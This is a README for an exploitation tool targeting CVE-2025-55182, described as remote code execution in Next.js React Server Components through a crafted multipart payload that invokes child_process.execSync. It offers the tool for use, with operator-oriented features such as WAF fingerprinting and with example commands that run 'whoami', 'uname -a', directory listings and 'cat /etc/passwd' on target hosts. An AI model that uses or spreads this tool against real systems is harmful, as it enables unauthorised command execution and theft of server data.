
POC-CVE-2025-55182
CVE-2025-55182 Advanced Scanner
A full-featured exploitation utility for CVE-2025-55182 — Remote Code Execution via React Server Components in Next.js. The scanner automatically crafts the multipart payload and abuses process.mainModule.require('child_process').execSync() to achieve arbitrary OS command execution on vulnerable instances.
Features
Auto payload generator — no manual encoding required Command execution with clean STDOUT extraction Automatic protocol detection (https:// applied if missing) Proper URL decoding + newline restoration Colored rich output for quick operator feedback Error fingerprinting (500 / 403 / SSL / timeout / WAF patterns)
Installation chmod +x scanner.sh
Usage
./scanner.sh -d vulnerable-app.com
./scanner.sh -d vulnerable-app.com -c "whoami"
./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"
Options

Examples
./scanner.sh -d shop.example.com
./scanner.sh -d shop.example.com -c "uname -a"
./scanner.sh -d shop.example.com -c "ls -la /var/www"
./scanner.sh -d shop.example.com -c "ping -c 4 google.com"
Feel free to reach out on mailto:[email protected]